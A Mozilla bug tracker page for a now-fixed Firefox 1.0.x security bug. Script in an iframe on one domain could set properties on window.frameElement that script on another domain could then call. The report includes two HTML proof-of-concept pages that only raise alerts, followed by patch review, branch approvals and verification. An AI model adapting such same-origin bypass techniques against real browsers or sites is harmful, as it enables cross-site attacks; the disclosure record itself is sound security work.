Closed Bug 294978 Opened 20 years ago Closed 19 years ago

cross-origin scripting using iframes

Categories

(Core :: Security, defect)

Product:
Core
Component:
Security
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
VERIFIED FIXED
Milestone:
mozilla1.8beta5

People

(Reporter: darin.moz, Assigned: jst)

References

(
URL
)

Details

(Keywords: fixed1.8, verified1.7.13, Whiteboard: [sg:fix])

Attachments

(2 files)

testcase (inner frame on friedfish.homeip.net)
589 bytes, text/html
Details
Do security check when accessing/setting non-IDL properties on [i]frame elements
9.20 KB, patch
dveditz
: review+
brendan
: superreview+
dveditz
: approval-aviary1.0.8+
dveditz
: approval1.7.13+
asa
: approval1.8b5+
Details | Diff | Splinter Review
It is possible in Firefox 1.0.x to assign attributes on window.frameElement from one domain and have them be callable from another domain. For example, http://first.domain/outer.html : ------------------------------------------------------------------------------ <html> <body> <script> function doOuter() { alert("Somebody just called the outer:\n" + window.location.href); } function callInner() { var iframe = document.getElementById("inner"); iframe.doInner(); } </script> <iframe id="inner" name="inner" src="http://second.domain/inner.html"></iframe> <br> <script> var iframe = document.getElementById("inner"); iframe.doOuter = doOuter; </script> <button onclick="callInner();">Call Inner</button> </body> </html> ------------------------------------------------------------------------------ http://second.domain/inner.html : ------------------------------------------------------------------------------ <html> <body> <script> function callOuter() { window.frameElement.doInner = doInner; window.frameElement.doOuter(); } function doInner() { alert("Somebody just called the inner:\n" + window.location.href); } window.frameElement.doInner = doInner; </script> <button onclick="callOuter();">Call Outer</button> </body> </html> ------------------------------------------------------------------------------ To replicate this testcase, you could for example put the file on an apache server and change second.domain to be the IP address of your server. Then visit outer.html using the hostname of your server. I set this up here: http://friedfish.homeip.net/~darinf/fun/outer.html Given that that machine is using dynamic DNS, there's no telling how long it will remain valid. From the testcase, press the "call inner" or "call outer" buttons, and notice the result. This seems like a bug to me. It doesn't work in IE. I don't know how critical this really is, but I'm filing it as Security-Sensitive just in case.
Flags: blocking1.8b4+
Flags: blocking1.7.10+
Flags: blocking-aviary1.0.6+
Whiteboard: [sg:fix]
Flags: blocking1.7.11+ → blocking1.7.12+
The nsHTMLFrameElementSH methods I added never got called, there's something about the flags I'm not understanding or setting correctly. punting to Johnny if we need a fix while I'm out.
Assignee: dveditz → jst
dveditz, care to put up what you've got so far? Sounds like some flags are missing indeed, show me a patch and I'll investigate.
dveditz, can you give us some status here? If you've got something, get that into the bug ASAP. Thanks.
Comment on attachment 197094 [details] [diff] [review] Do security check when accessing/setting non-IDL properties on [i]frame elements Looks good to me. /be
Attachment #197094 - Flags: superreview?(brendan) → superreview+
Comment on attachment 197094 [details] [diff] [review] Do security check when accessing/setting non-IDL properties on [i]frame elements r=dveditz
Attachment #197094 - Flags: review?(dveditz) → review+
Attachment #197094 - Flags: approval1.8b5?
Fixed on the trunk.
Status: NEW → ASSIGNED
Target Milestone: --- → mozilla1.8beta5
Status: ASSIGNED → RESOLVED
Closed: 19 years ago
Resolution: --- → FIXED
Attachment #197094 - Flags: approval1.8b5? → approval1.8b5+
jst, is this ready to land on the branch yet? If so, can you get that in soon? Thanks.
Fixed on the branch.
Keywords: fixed1.8
Flags: testcase+
Comment on attachment 197094 [details] [diff] [review] Do security check when accessing/setting non-IDL properties on [i]frame elements a=dveditz for drivers for the aviary101/moz17 branch
Attachment #197094 - Flags: approval1.7.13+
Attachment #197094 - Flags: approval-aviary1.0.8+
Fixed on the 1.0.1 and 1.7 branches.
Keywords: fixed-aviary1.0.8, fixed1.7.13
verified with: Windows: Moz - Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060214 Fx - Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060214 Firefox/1.0.8 Macintosh: Moz - Mozilla/5.0 (Macintosh; U;PPC Mac OS X Mach-O; en-US; rv:1.7.13) Gecko/20060214 Firefox/1.0.8 Fx - Mozilla/5.0 (Macintosh; U;PPC Mac OS X Mach-O; en-US; rv:1.7.13) Gecko/20060214 Firefox/1.0.8 Linux Moz - Mozilla/5.0 (X11; U;Linux i686; en-US; rv:1.7.13) Gecko/20060214 Fx - Mozilla/5.0 (X11; U;Linux i686; en-US; rv:1.7.13) Gecko/20060214 Firefox/1.0.8
Status: RESOLVED → VERIFIED
Keywords: fixed-aviary1.0.8, fixed1.7.13verified-aviary1.0.8, verified1.7.13
Group: security
Flags: in-testsuite+ → in-testsuite?
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: